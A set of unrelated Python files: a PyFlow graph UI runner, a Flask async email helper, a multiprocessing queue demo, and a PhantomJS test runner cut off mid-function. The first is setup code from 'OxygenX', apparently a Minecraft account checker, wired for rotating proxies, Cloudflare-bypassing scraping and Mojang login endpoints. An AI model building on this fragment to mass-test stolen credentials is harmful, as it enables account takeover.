
        class API:
            # optional proxy-list API endpoint and refresh interval
            use = bool(settings['OxygenX']['proxy']['api']['use'])
            api = str(settings['OxygenX']['proxy']['api']['api_link'])
            refresh = int(settings['OxygenX']['proxy']['api']['refresh_time'])
if __name__ == '__main__':
    # console clear helper, keyed off os.name
    clear = lambda: system('cls' if name == 'nt' else 'clear')
    init()  # presumably colorama's init (Fore is used below) — confirm import
    session = Session()
    lock = Lock()
    # pre-compiled scrapers for the rank/level pages (`compile` is re.compile here)
    veltrankz = compile(r'<h2 style=\"color: .*\">(.*)</h2>')
    rankhv = compile(r'class=\"rank.*\">(.*)<')
    levelmp = compile(r'>Level (.*)</b>')
    rankmp = compile(r'class=\"www-mp-rank\".*>(.*)</span>')
    # bright color shortcuts used throughout the output
    yellow = Fore.LIGHTYELLOW_EX
    red = Fore.LIGHTRED_EX
    green = Fore.LIGHTGREEN_EX
    cyan = Fore.LIGHTCYAN_EX
    blue = Fore.LIGHTBLUE_EX
    white = Fore.LIGHTWHITE_EX
    magenta = Fore.LIGHTMAGENTA_EX
    agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36'
    # cloudflare-capable scraper sharing the same browser identity
    scraper = create_scraper(sess=Session(), browser={'custom': agent})
    mailheaders = {'user-agent': agent}
    jsonheaders = {"Content-Type": "application/json", 'Pragma': 'no-cache'}
    # Mojang API endpoints
    user_url = 'https://api.mojang.com/profiles/minecraft'
    auth_mc = 'https://authserver.mojang.com/authenticate'
    sfa_url = 'https://api.mojang.com/user/security/challenges'
    # characters considered invalid in usernames/passwords
    charz = ['@', '!', '#', '$', '%', '^', '&', '*', ')', '(', '-', '}', '{', ']', '"', '+', '=', '?', '/',
             '.', '>', ',', '<', '`', '\'', '~', '[', '\\', ' ']
    # version = 'CN1.0'
    set_title(f'OxygenX-{version} | by earthno1')
    # ASCII-art banner printed by start_checker
    t = f'''{cyan}________ ____ ___
\_____ \ ___ ______.__. ____ ____ ____ \ \/ /
/ | \\\ \/ < | |/ ___\_/ __ \ / \ \ /
/ | \> < \___ / /_/ > ___/| | \/ \\
\_______ /__/\_ \/ ____\___ / \___ >___| /___/\ \\
\/ \/\/ /_____/ \/ \/ \_/
\n'''
    if OxygenX.version_check:
        checkforupdates()
    Main()
|
graphUiParser.py | ## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import os
import sys
import json
import threading
import time
from PySide2.QtWidgets import *
from PySide2 import QtGui
from PySide2 import QtCore
from PyFlow import INITIALIZE
from PyFlow.Core.Common import *
from PyFlow.Core.GraphManager import GraphManagerSingleton
from PyFlow.UI.Canvas.UINodeBase import getUINodeInstance
from PyFlow.UI.Utils.stylesheet import editableStyleSheet
from PyFlow.UI.Widgets.PropertiesFramework import CollapsibleFormWidget
import PyFlow.UI.resources
def run(filePath):
    """Load a serialized PyFlow graph and present its graphInputs in a dialog.

    Builds a Qt application, deserializes *filePath*, creates collapsible
    widget sections for every graphInputs node (plus any node exposing its
    inputs to the compound), then ticks the graph on a background thread
    until termination is requested.  Error states are shown via QMessageBox.
    """
    app = QApplication(sys.argv)
    app.setStyle(QStyleFactory.create("plastique"))
    app.setStyleSheet(editableStyleSheet().getStyleSheet())
    # pre-built critical-error dialog, reused by all failure paths below
    msg = QMessageBox()
    msg.setWindowIcon(QtGui.QIcon(":/LogoBpApp.png"))
    msg.setIcon(QMessageBox.Critical)
    if os.path.exists(filePath):
        with open(filePath, 'r') as f:
            data = json.load(f)
        # Window to display inputs
        prop = QDialog()
        prop.setLayout(QVBoxLayout())
        prop.setWindowTitle(filePath)
        prop.setWindowIcon(QtGui.QIcon(":/LogoBpApp.png"))
        # Initialize packages
        try:
            INITIALIZE()
            man = GraphManagerSingleton().get()
            man.deserialize(data)
            grph = man.findRootGraph()
            inputs = grph.getNodesByClassName("graphInputs")
            if len(inputs) > 0:
                # one collapsible section per graphInputs node
                for inp in inputs:
                    uiNode = getUINodeInstance(inp)
                    uiNodeJsonTemplate = inp.serialize()
                    uiNodeJsonTemplate["wrapper"] = inp.wrapperJsonData
                    uiNode.postCreate(uiNodeJsonTemplate)
                    cat = CollapsibleFormWidget(headName=inp.name)
                    prop.layout().addWidget(cat)
                    cat = uiNode.createOutputWidgets(cat)
                # additionally expose inputs of nodes flagged for the compound
                nodes = grph.getNodesList()
                if len(nodes) > 0:
                    for node in nodes:
                        uiNode = getUINodeInstance(node)
                        uiNodeJsonTemplate = node.serialize()
                        uiNodeJsonTemplate["wrapper"] = node.wrapperJsonData
                        uiNode.postCreate(uiNodeJsonTemplate)
                        if uiNode.bExposeInputsToCompound:
                            cat = CollapsibleFormWidget(headName="{} inputs".format(node.name))
                            prop.layout().addWidget(cat)
                            uiNode.createInputWidgets(cat, pins=False)
                prop.show()

                def programLoop():
                    # drive the graph at ~50 ticks/second until told to stop
                    while True:
                        man.Tick(deltaTime=0.02)
                        time.sleep(0.02)
                        if man.terminationRequested:
                            break

                t = threading.Thread(target=programLoop)
                t.start()

                def quitEvent():
                    # ask the tick loop to stop and wait for it on app exit
                    man.terminationRequested = True
                    t.join()

                app.aboutToQuit.connect(quitEvent)
            # If no GraphInput Nodes Exit propgram
            else:
                msg.setInformativeText(filePath)
                msg.setDetailedText("The file doesn't contain graphInputs nodes")
                msg.setWindowTitle("PyFlow Ui Graph Parser")
                msg.setStandardButtons(QMessageBox.Ok)
                msg.show()
        except Exception as e:
            msg.setText("Error reading Graph")
            msg.setInformativeText(filePath)
            msg.setDetailedText(str(e))
            msg.setWindowTitle("PyFlow Ui Graph Parser")
            msg.setStandardButtons(QMessageBox.Ok)
            msg.show()
    else:
        msg.setText("File Not Found")
        msg.setInformativeText(filePath)
        msg.setWindowTitle("PyFlow Ui Graph Parser")
        msg.setStandardButtons(QMessageBox.Ok)
        msg.show()
    try:
        sys.exit(app.exec_())
    except Exception as e:
        print(e)
|
email.py | from flask import Flask,render_template,current_app
from flask_mail import Message
from threading import Thread #导入线程
from .extensions import mail
def async_send_mail(app, msg):
    """Send *msg* from a worker thread inside the given app's context."""
    # Flask extensions require an application context even off the request thread
    with app.app_context():
        mail.send(message=msg)  # deliver the email
def send_mail(subject, to, tem, **kwargs):
    """Render an HTML email template and send it on a background thread.

    :param subject: mail subject line
    :param to: recipient address
    :param tem: template name under templates/email/ (without ``.html``)
    :param kwargs: variables passed through to the template
    :return: None
    """
    # unwrap the real application object from the current_app proxy,
    # since the worker thread has no request/app context of its own
    app = current_app._get_current_object()
    msg = Message(subject=subject, recipients=[to], sender=app.config['MAIL_USERNAME'])
    msg.html = render_template('email/'+tem+'.html', **kwargs)
    thr = Thread(target=async_send_mail, args=(app, msg))
    thr.start()  # fire-and-forget; caller is not notified of send failures
|
003b_message_queue (005b).py | import multiprocessing
from time import sleep
def square_list(mylist, q):
    """Put the square of every element of *mylist* onto queue *q*.

    BUG FIX: the docstring previously appeared *after* the first print
    statement, where it is a plain string expression rather than a
    docstring; it now documents the function properly.
    """
    print('From process p1 ... creating squared queue')
    # append squares of mylist to queue
    for num in mylist:
        q.put(num * num)
    # note: this prints the *input* list, not the squares
    print(f'Queue: {mylist[:]}\n')
def print_queue(q):
    """Drain queue *q*, echoing its elements, then announce it is empty."""
    print('From process p2 ... retriving squared queue')
    drained = []
    while not q.empty():
        drained.append(q.get())
    # single write preserves the original trailing-space-per-element format
    print("Queue elements: " + "".join(f"{item} " for item in drained), end='')
    print("\nQueue is now empty!")
if __name__ == "__main__":
    # input list
    mylist = [1,2,3,4]

    # creating multiprocessing Queue (shared between the two processes)
    q = multiprocessing.Queue()

    # creating new processes
    p1 = multiprocessing.Process(target=square_list, args=(mylist, q))
    p2 = multiprocessing.Process(target=print_queue, args=(q,))

    # running process p1 to square list; join() ensures the queue is
    # fully populated before p2 starts draining it
    p1.start()
    p1.join()

    # running process p2 to get queue elements
    p2.start()
    p2.join()
|
run-tests.py | #!/usr/bin/env python
import argparse
import collections
import errno
import glob
import imp
import os
import platform
import posixpath
import re
import shlex
import SimpleHTTPServer
import socket
import SocketServer
import ssl
import string
import cStringIO as StringIO
import subprocess
import sys
import threading
import time
import traceback
import urllib
# All files matching one of these glob patterns will be run as tests.
# NOTE(review): patterns appear to be resolved relative to the test
# directory — confirm against the (not shown) main/driver code.
TESTS = [
    'basics/*.js',
    'module/*/*.js',
    'standards/*/*.js',
    'regression/*.js',
]

TIMEOUT = 7  # Maximum duration of PhantomJS execution (in seconds).
             # This is a backstop; testharness.js imposes a shorter
             # timeout. Both can be increased if necessary.
#
# Utilities
#
# FIXME: assumes ANSI/VT100 escape sequences
# properly this should use curses, but that's an awful lot of work
# One of colors 30 ("black" -- usually a dark gray) and 37 ("white" --
# usually a very light gray) will almost certainly be illegible
# against the terminal background, so we provide neither.
# The colorization mode is global because so is sys.stdout.
# Escape-code tables keyed by a one-character style mnemonic:
# "_" = reset, "^" = bold; lowercase letters = colors, uppercase = the
# bold variant of the same color.  One of the three tables below is
# installed into _COLORS by activate_colorization().
_COLOR_NONE = {
    # colorization disabled: every key expands to nothing
    "_": "", "^": "",
    "r": "", "R": "",
    "g": "", "G": "",
    "y": "", "Y": "",
    "b": "", "B": "",
    "m": "", "M": "",
    "c": "", "C": "",
}
_COLOR_ON = {
    # full ANSI color support
    "_": "\033[0m", "^": "\033[1m",
    "r": "\033[31m", "R": "\033[1;31m",
    "g": "\033[32m", "G": "\033[1;32m",
    "y": "\033[33m", "Y": "\033[1;33m",
    "b": "\033[34m", "B": "\033[1;34m",
    "m": "\033[35m", "M": "\033[1;35m",
    "c": "\033[36m", "C": "\033[1;36m",
}
_COLOR_BOLD = {
    # monochrome terminals: bold/reset only, no colors
    "_": "\033[0m", "^": "\033[1m",
    "r": "\033[0m", "R": "\033[1m",
    "g": "\033[0m", "G": "\033[1m",
    "y": "\033[0m", "Y": "\033[1m",
    "b": "\033[0m", "B": "\033[1m",
    "m": "\033[0m", "M": "\033[1m",
    "c": "\033[0m", "C": "\033[1m",
}
_COLORS = None  # set by activate_colorization() before any colorize() call
def activate_colorization(options):
    """Install the global color table based on --color and terminal support."""
    global _COLORS
    if options.color == "always":
        _COLORS = _COLOR_ON
        return
    if options.color == "never":
        _COLORS = _COLOR_NONE
        return
    # "auto" mode: colorize only on a capable, non-Windows tty
    _COLORS = _COLOR_NONE
    if sys.stdout.isatty() and platform.system() != "Windows":
        try:
            ncolors = int(subprocess.check_output(["tput", "colors"]))
        except subprocess.CalledProcessError:
            return  # tput failed: stay monochrome
        _COLORS = _COLOR_ON if ncolors >= 8 else _COLOR_BOLD
def colorize(color, message):
    # Wrap *message* in the escape sequence for *color*, resetting after;
    # a no-op when colorization is off (_COLORS is _COLOR_NONE).
    return _COLORS[color] + message + _COLORS["_"]
# create_default_context and SSLContext were only added in 2.7.9,
# which is newer than the python2 that ships with OSX :-(
# The fallback tries to mimic what create_default_context(CLIENT_AUTH)
# does. Security obviously isn't important in itself for a test
# server, but making sure the PJS client can talk to a server
# configured according to modern TLS best practices _is_ important.
# Unfortunately, there is no way to set things like OP_NO_SSL2 or
# OP_CIPHER_SERVER_PREFERENCE prior to 2.7.9.
CIPHERLIST_2_7_9 = (
'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:'
'!eNULL:!MD5:!DSS:!RC4'
)
def wrap_socket_ssl(sock, base_path):
    """Wrap *sock* as a TLS server socket using the snakeoil certificate.

    Prefers ssl.create_default_context (Python 2.7.9+); on older ssl
    modules falls back to ssl.wrap_socket with an equivalent cipher list.
    """
    crtfile = os.path.join(base_path, 'certs/https-snakeoil.crt')
    keyfile = os.path.join(base_path, 'certs/https-snakeoil.key')
    try:
        ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        ctx.load_cert_chain(crtfile, keyfile)
        return ctx.wrap_socket(sock, server_side=True)
    except AttributeError:
        # pre-2.7.9 ssl module: no SSLContext/create_default_context
        return ssl.wrap_socket(sock,
                               keyfile=keyfile,
                               certfile=crtfile,
                               server_side=True,
                               ciphers=CIPHERLIST_2_7_9)
# This should be in the standard library somewhere, but as far as I
# can tell, it isn't.
class ResponseHookImporter(object):
    """Loads .py response-hook modules from the www/ tree on demand."""
    def __init__(self, www_path):
        # All Python response hooks, no matter how deep below www_path,
        # are treated as direct children of the fake "test_www" package.
        if 'test_www' not in sys.modules:
            imp.load_source('test_www', www_path + '/__init__.py')
        # map path separators and friends to underscores so the path
        # becomes a valid module name (Python 2 string.maketrans)
        self.tr = string.maketrans('-./%', '____')

    def __call__(self, path):
        # Return the cached module for *path*, loading it on first use.
        modname = 'test_www.' + path.translate(self.tr)
        try:
            return sys.modules[modname]
        except KeyError:
            return imp.load_source(modname, path)
# This should also be in the standard library somewhere, and
# definitely isn't.
#
# FIXME: This currently involves *three* threads for every process,
# and a fourth if the process takes input. (On Unix, clever use of
# select() might be able to get that down to one, but zero is Hard.
# On Windows, we're hosed. 3.4's asyncio module would make everything
# better, but 3.4 is its own can of worms.)
try:
    devnull = subprocess.DEVNULL
except AttributeError:
    # Python < 3.3 has no subprocess.DEVNULL: open os.devnull once and reuse.
    # (Narrowed from a bare `except:`.)
    devnull = os.open(os.devnull, os.O_RDONLY)

def do_call_subprocess(command, verbose, stdin_data, timeout):
    """Run *command*, feeding it *stdin_data* and capturing output.

    Returns (returncode, stdout_lines, stderr_lines).  The process is
    terminated after *timeout* seconds, in which case a "TIMEOUT: ..."
    message is appended to stderr_lines.
    """
    def read_thread(linebuf, fp):
        # BUG FIX: the line was previously rstripped *before* the EOF
        # test, so a blank line in the output terminated capture early.
        # readline() returns '' only at true EOF.
        while True:
            line = fp.readline()
            if not line: break  # EOF
            line = line.rstrip()
            if line:
                linebuf.append(line)
                if verbose >= 3:
                    sys.stdout.write(line + '\n')

    def write_thread(data, fp):
        fp.writelines(data)
        fp.close()

    def reap_thread(proc, timed_out):
        # fires after `timeout` seconds; kills the process if still running
        if proc.returncode is None:
            proc.terminate()
            timed_out[0] = True

    class DummyThread:
        # stand-in when there is no stdin to feed
        def start(self): pass
        def join(self): pass

    if stdin_data:
        stdin = subprocess.PIPE
    else:
        stdin = devnull

    proc = subprocess.Popen(command,
                            stdin=stdin,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    if stdin_data:
        sithrd = threading.Thread(target=write_thread,
                                  args=(stdin_data, proc.stdin))
    else:
        sithrd = DummyThread()

    stdout = []
    stderr = []
    timed_out = [False]
    sothrd = threading.Thread(target=read_thread, args=(stdout, proc.stdout))
    sethrd = threading.Thread(target=read_thread, args=(stderr, proc.stderr))
    rpthrd = threading.Timer(timeout, reap_thread, args=(proc, timed_out))

    sithrd.start()
    sothrd.start()
    sethrd.start()
    rpthrd.start()

    proc.wait()
    if not timed_out[0]: rpthrd.cancel()

    sithrd.join()
    sothrd.join()
    sethrd.join()
    rpthrd.join()

    if timed_out[0]:
        stderr.append("TIMEOUT: Process terminated after {} seconds."
                      .format(timeout))
        if verbose >= 3:
            sys.stdout.write(stderr[-1] + "\n")

    rc = proc.returncode
    if verbose >= 3:
        if rc < 0:
            sys.stdout.write("## killed by signal {}\n".format(-rc))
        else:
            sys.stdout.write("## exit {}\n".format(rc))
    return proc.returncode, stdout, stderr
#
# HTTP/HTTPS server, presented on localhost to the tests
#
class FileHandler(SimpleHTTPServer.SimpleHTTPRequestHandler, object):
    """Request handler serving the test www/ tree, with .py response hooks."""

    def __init__(self, *args, **kwargs):
        self._cached_untranslated_path = None
        self._cached_translated_path = None
        self.postdata = None
        super(FileHandler, self).__init__(*args, **kwargs)

    # silent, do not pollute stdout nor stderr.
    def log_message(self, format, *args):
        return

    # accept POSTs, read the postdata and stash it in an instance variable,
    # then forward to do_GET; handle_request hooks can vary their behavior
    # based on the presence of postdata and/or the command verb.
    def do_POST(self):
        try:
            ln = int(self.headers.get('content-length'))
        except (TypeError, ValueError):
            # BUG FIX: was `except TypeError, ValueError:`, which in
            # Python 2 catches only TypeError and *binds* it to the name
            # ValueError — a non-numeric Content-Length crashed the server
            # instead of producing this 400 response.
            self.send_response(400, 'Bad Request')
            self.send_header('Content-Type', 'text/plain')
            self.end_headers()
            self.wfile.write("No or invalid Content-Length in POST (%r)"
                             % self.headers.get('content-length'))
            return
        self.postdata = self.rfile.read(ln)
        self.do_GET()

    # allow provision of a .py file that will be interpreted to
    # produce the response.
    def send_head(self):
        path = self.translate_path(self.path)

        # do not allow direct references to .py(c) files,
        # or indirect references to __init__.py
        if (path.endswith('.py') or path.endswith('.pyc') or
            path.endswith('__init__')):
            self.send_error(404, 'File not found')
            return None

        if os.path.exists(path):
            return super(FileHandler, self).send_head()

        py = path + '.py'
        if os.path.exists(py):
            try:
                mod = self.get_response_hook(py)
                return mod.handle_request(self)
            except:
                # deliberate catch-all: report a 500, then re-raise so the
                # error also reaches the test runner via handle_error
                self.send_error(500, 'Internal Server Error in '+py)
                raise

        self.send_error(404, 'File not found')
        return None

    # modified version of SimpleHTTPRequestHandler's translate_path
    # to resolve the URL relative to the www/ directory
    # (e.g. /foo -> test/www/foo)
    def translate_path(self, path):
        # Cache for efficiency, since our send_head calls this and
        # then, in the normal case, the parent class's send_head
        # immediately calls it again.
        if (self._cached_translated_path is not None and
            self._cached_untranslated_path == path):
            return self._cached_translated_path

        orig_path = path

        # Strip query string and/or fragment, if present.
        x = path.find('?')
        if x != -1: path = path[:x]
        x = path.find('#')
        if x != -1: path = path[:x]

        # Ensure consistent encoding of special characters, then
        # lowercase everything so that the tests behave consistently
        # whether or not the local filesystem is case-sensitive.
        path = urllib.quote(urllib.unquote(path)).lower()

        # Prevent access to files outside www/.
        # At this point we want specifically POSIX-like treatment of 'path'
        # because it is still a URL component and not a filesystem path.
        # SimpleHTTPRequestHandler.send_head() expects us to preserve the
        # distinction between paths with and without a trailing slash, but
        # posixpath.normpath() discards that distinction.
        trailing_slash = path.endswith('/')
        path = posixpath.normpath(path)
        while path.startswith('/'):
            path = path[1:]
        while path.startswith('../'):
            path = path[3:]

        # Now resolve the normalized, clamped path relative to the www/
        # directory, according to local OS conventions.
        path = os.path.normpath(os.path.join(self.www_path, *path.split('/')))
        if trailing_slash:
            # it must be a '/' even on Windows
            path += '/'

        self._cached_untranslated_path = orig_path
        self._cached_translated_path = path
        return path
class TCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    """Threaded TCP server on an ephemeral localhost port, optionally TLS."""
    # This is how you are officially supposed to set SO_REUSEADDR per
    # https://docs.python.org/2/library/socketserver.html#SocketServer.BaseServer.allow_reuse_address
    allow_reuse_address = True

    def __init__(self, use_ssl, handler, base_path, signal_error):
        # port 0: let the OS pick a free port (read back via server_address)
        SocketServer.TCPServer.__init__(self, ('localhost', 0), handler)
        if use_ssl:
            self.socket = wrap_socket_ssl(self.socket, base_path)
        self._signal_error = signal_error  # callback for unexpected errors

    def handle_error(self, request, client_address):
        # Ignore errors which can occur naturally if the client
        # disconnects in the middle of a request.  EPIPE and
        # ECONNRESET *should* be the only such error codes
        # (according to the OSX manpage for send()).
        _, exval, _ = sys.exc_info()
        if getattr(exval, 'errno', None) in (errno.EPIPE, errno.ECONNRESET):
            return
        # Otherwise, report the error to the test runner.
        self._signal_error(sys.exc_info())
class HTTPTestServer(object):
    """Context manager serving the test www/ tree over HTTP and HTTPS on
    ephemeral localhost ports, advertised via TEST_HTTP(S)_BASE env vars."""
    def __init__(self, base_path, signal_error, verbose):
        self.httpd = None
        self.httpsd = None
        self.base_path = base_path
        self.www_path = os.path.join(base_path, 'www')
        self.signal_error = signal_error  # forwarded to TCPServer
        self.verbose = verbose

    def __enter__(self):
        """Start both servers on daemon threads and export their URLs."""
        handler = FileHandler
        handler.extensions_map.update({
            '.htm': 'text/html',
            '.html': 'text/html',
            '.css': 'text/css',
            '.js': 'application/javascript',
            '.json': 'application/json'
        })
        handler.www_path = self.www_path
        handler.get_response_hook = ResponseHookImporter(self.www_path)

        self.httpd = TCPServer(False, handler,
                               self.base_path, self.signal_error)
        # the OS chose the port; tell the tests where the server lives
        os.environ['TEST_HTTP_BASE'] = \
            'http://localhost:{}/'.format(self.httpd.server_address[1])
        httpd_thread = threading.Thread(target=self.httpd.serve_forever)
        httpd_thread.daemon = True
        httpd_thread.start()
        if self.verbose >= 3:
            sys.stdout.write("## HTTP server at {}\n".format(
                os.environ['TEST_HTTP_BASE']))

        self.httpsd = TCPServer(True, handler,
                                self.base_path, self.signal_error)
        os.environ['TEST_HTTPS_BASE'] = \
            'https://localhost:{}/'.format(self.httpsd.server_address[1])
        httpsd_thread = threading.Thread(target=self.httpsd.serve_forever)
        httpsd_thread.daemon = True
        httpsd_thread.start()
        if self.verbose >= 3:
            sys.stdout.write("## HTTPS server at {}\n".format(
                os.environ['TEST_HTTPS_BASE']))
        return self

    def __exit__(self, *dontcare):
        """Stop both servers and remove the environment variables."""
        self.httpd.shutdown()
        del os.environ['TEST_HTTP_BASE']
        self.httpsd.shutdown()
        del os.environ['TEST_HTTPS_BASE']
#
# Running tests and interpreting their results
#
class TestDetailCode(collections.namedtuple("TestDetailCode", (
        "idx", "color", "short_label", "label", "long_label"))):
    """A detail-category code; indexes, hashes and compares by idx alone."""

    def __index__(self):
        # lets a code be used directly as a list index (see TestGroup.n)
        return self.idx

    def __hash__(self):
        return self.idx

    def __eq__(self, other):
        return other.idx == self.idx

    def __ne__(self, other):
        return not (other.idx == self.idx)
class T(object):
    """Namespace of test-detail categories and their display attributes."""
    PASS = TestDetailCode(0, "g", ".", "pass", "passed")
    FAIL = TestDetailCode(1, "R", "F", "FAIL", "failed")
    XFAIL = TestDetailCode(2, "y", "f", "xfail", "failed as expected")
    XPASS = TestDetailCode(3, "Y", "P", "XPASS", "passed unexpectedly")
    ERROR = TestDetailCode(4, "R", "E", "ERROR", "had errors")
    SKIP = TestDetailCode(5, "m", "s", "skip", "skipped")
    UNSUPPORTED = TestDetailCode(6, "y", "u", "unsupported", "unsupported")
    MAX = 7  # number of categories; sizes the per-group tally array
class TestDetail(object):
    """Holds one block of details about a test that failed."""
    # types of details:
    def __init__(self, message, test_id, detail_type):
        # normalize `message` to a flat list of rstripped lines
        if not isinstance(message, list):
            message = [message]
        self.message = [line.rstrip()
                        for chunk in message
                        for line in chunk.split("\n")]
        self.dtype = detail_type  # a TestDetailCode
        self.test_id = test_id

    def report(self, fp):
        """Write this detail to *fp*: a labeled header, then message lines."""
        col, label = self.dtype.color, self.dtype.label
        if self.test_id:
            fp.write("{:>5}: {}\n".format(colorize(col, label),
                                          self.test_id))
            lo = 0
        else:
            # no test id: promote the first message line into the header
            fp.write("{:>5}: {}\n".format(colorize(col, label),
                                          self.message[0]))
            lo = 1
        for line in self.message[lo:]:
            fp.write(" {}\n".format(colorize("b", line)))
class TestGroup(object):
    """Holds the result of one group of tests (that is, one .js file),
    parsed from the output of run_phantomjs (see below).
    Subclasses specify what the output means.
    A test with zero details is considered to be successful.
    """
    def __init__(self, name):
        self.name = name
        # per-category tallies, indexed by a TestDetailCode (via __index__)
        self.n = [0]*T.MAX
        self.details = []  # TestDetail records, in order of occurrence

    def parse(self, rc, out, err):
        """Interpret process results; implemented by subclasses."""
        raise NotImplementedError

    def _add_d(self, message, test_id, dtype):
        # record one detail and bump the tally for its category
        self.n[dtype] += 1
        self.details.append(TestDetail(message, test_id, dtype))

    # convenience wrappers, one per detail category
    def add_pass (self, m, t): self._add_d(m, t, T.PASS)
    def add_fail (self, m, t): self._add_d(m, t, T.FAIL)
    def add_xpass(self, m, t): self._add_d(m, t, T.XPASS)
    def add_xfail(self, m, t): self._add_d(m, t, T.XFAIL)
    def add_error(self, m, t): self._add_d(m, t, T.ERROR)
    def add_skip (self, m, t): self._add_d(m, t, T.SKIP)
    def add_unsupported (self, m, t): self._add_d(m, t, T.UNSUPPORTED)

    def default_interpret_exit_code(self, rc):
        """Flag mismatches between the exit code and the parsed results."""
        if rc == 0:
            if not self.is_successful() and not self.n[T.ERROR]:
                self.add_error([],
                               "PhantomJS exited successfully when test failed")

        # Exit code -15 indicates a timeout.
        elif rc == 1 or rc == -15:
            if self.is_successful():
                self.add_error([], "PhantomJS exited unsuccessfully")

        elif rc >= 2:
            self.add_error([], "PhantomJS exited with code {}".format(rc))
        else:
            self.add_error([], "PhantomJS killed by signal {}".format(-rc))

    def is_successful(self):
        # errors, hard fails, and unexpected passes all count as failure
        return self.n[T.FAIL] + self.n[T.XPASS] + self.n[T.ERROR] == 0

    def worst_code(self):
        # worst-to-best ordering
        for code in (T.ERROR, T.FAIL, T.XPASS, T.SKIP, T.XFAIL, T.PASS, T.UNSUPPORTED):
            if self.n[code] > 0:
                return code
        return T.PASS

    def one_char_summary(self, fp):
        # a single colored character, for the default progress display
        code = self.worst_code()
        fp.write(colorize(code.color, code.short_label))
        fp.flush()

    def line_summary(self, fp):
        code = self.worst_code()
        fp.write("{}: {}\n".format(colorize("^", self.name),
                                   colorize(code.color, code.label)))

    def report(self, fp, show_all):
        """Print a full report; uninteresting detail types are elided
        unless show_all is set."""
        self.line_summary(fp)
        need_blank_line = False
        for detail in self.details:
            if show_all or detail.dtype not in (T.PASS, T.XFAIL, T.SKIP):
                detail.report(fp)
                need_blank_line = True
        if need_blank_line:
            fp.write("\n")

    def report_for_verbose_level(self, fp, verbose):
        # 0: one char; 1: failures only; 2+: everything
        if verbose == 0:
            self.one_char_summary(sys.stdout)
        elif verbose == 1:
            self.report(sys.stdout, False)
        else:
            self.report(sys.stdout, True)
class UnsupportedTestGroup(TestGroup):
    """Test group which is currently unsupported and should
    be skipped altogether.
    """

    def __init__(self, name):
        TestGroup.__init__(self, name)
        self.add_unsupported('', 'Skipping the whole file')
class ExpectTestGroup(TestGroup):
    """Test group whose output must be exactly as specified by directives
    in the file. This is how you test for an _unsuccessful_ exit code,
    or for output appearing on a specific one of stdout/stderr.
    """
    def __init__(self, name, rc_exp, stdout_exp, stderr_exp,
                 rc_xfail, stdout_xfail, stderr_xfail):
        TestGroup.__init__(self, name)
        if rc_exp is None: rc_exp = 0  # default expectation: success
        self.rc_exp = rc_exp           # expected exit code
        self.stdout_exp = stdout_exp   # expected stdout lines
        self.stderr_exp = stderr_exp   # expected stderr lines
        # *_xfail flags: a mismatch counts as expected failure, a match
        # as an unexpected pass
        self.rc_xfail = rc_xfail
        self.stdout_xfail = stdout_xfail
        self.stderr_xfail = stderr_xfail

    def parse(self, rc, out, err):
        """Compare actual rc/stdout/stderr against the expectations."""
        self.parse_output("stdout", self.stdout_exp, out, self.stdout_xfail)
        self.parse_output("stderr", self.stderr_exp, err, self.stderr_xfail)

        exit_msg = ["expected exit code {} got {}"
                    .format(self.rc_exp, rc)]
        if rc != self.rc_exp:
            exit_desc = "did not exit as expected"
            if self.rc_xfail:
                self.add_xfail(exit_msg, exit_desc)
            else:
                self.add_fail(exit_msg, exit_desc)
        else:
            exit_desc = "exited as expected"
            if self.rc_xfail:
                self.add_xpass(exit_msg, exit_desc)
            else:
                self.add_pass(exit_msg, exit_desc)

    def parse_output(self, what, exp, got, xfail):
        """Line-by-line diff of expected vs actual output for one stream."""
        diff = []
        le = len(exp)
        lg = len(got)
        for i in range(max(le, lg)):
            e = ""
            g = ""
            if i < le: e = exp[i]
            if i < lg: g = got[i]
            if e != g:
                # repr()[1:-1] strips the quotes but keeps escapes visible
                diff.extend(("{}: line {} not as expected".format(what, i+1),
                             "-" + repr(e)[1:-1],
                             "+" + repr(g)[1:-1]))

        if diff:
            desc = what + " not as expected"
            if xfail:
                self.add_xfail(diff, desc)
            else:
                self.add_fail(diff, desc)
        else:
            desc = what + " as expected"
            if xfail:
                self.add_xpass(diff, desc)
            else:
                self.add_pass(diff, desc)
class TAPTestGroup(TestGroup):
    """Test group whose output is interpreted according to a variant of the
    Test Anything Protocol (http://testanything.org/tap-specification.html).
    Relative to that specification, these are the changes:
    * Plan-at-the-end, explanations for directives, and "Bail out!"
      are not supported. ("1..0 # SKIP: explanation" *is* supported.)
    * "Anything else" lines are an error.
    * Repeating a test point number, or using one outside the plan
      range, is an error (this is unspecified in TAP proper).
    * Diagnostic lines beginning with # are taken as additional
      information about the *next* test point. Diagnostic lines
      beginning with ## are ignored.
    * Directives are case sensitive.
    """
    # "# text": group(1)="" group(2)=text; "## text": group(1)="#" (ignored)
    diag_r = re.compile(r"^#(#*)\s*(.*)$")
    # plan line "1..N", optionally with "# SKIP[: reason]"
    plan_r = re.compile(r"^1..(\d+)(?:\s*\#\s*SKIP(?::\s*(.*)))?$")
    # test line: ok/not ok, optional point number, description, directive
    test_r = re.compile(r"^(not ok|ok)\s*"
                        r"([0-9]+)?\s*"
                        r"([^#]*)(?:# (TODO|SKIP))?$")

    def parse(self, rc, out, err):
        self.parse_tap(out, err)
        self.default_interpret_exit_code(rc)

    def parse_tap(self, out, err):
        points_already_used = set()
        messages = []  # diagnostics accumulated for the next test point

        # Look for the plan.
        # Diagnostic lines are allowed to appear above the plan, but not
        # test lines.
        for i in range(len(out)):
            line = out[i]
            m = self.diag_r.match(line)
            if m:
                if not m.group(1):
                    messages.append(m.group(2))
                continue

            m = self.plan_r.match(line)
            if m:
                break

            # neither a diagnostic nor the plan line: fatal
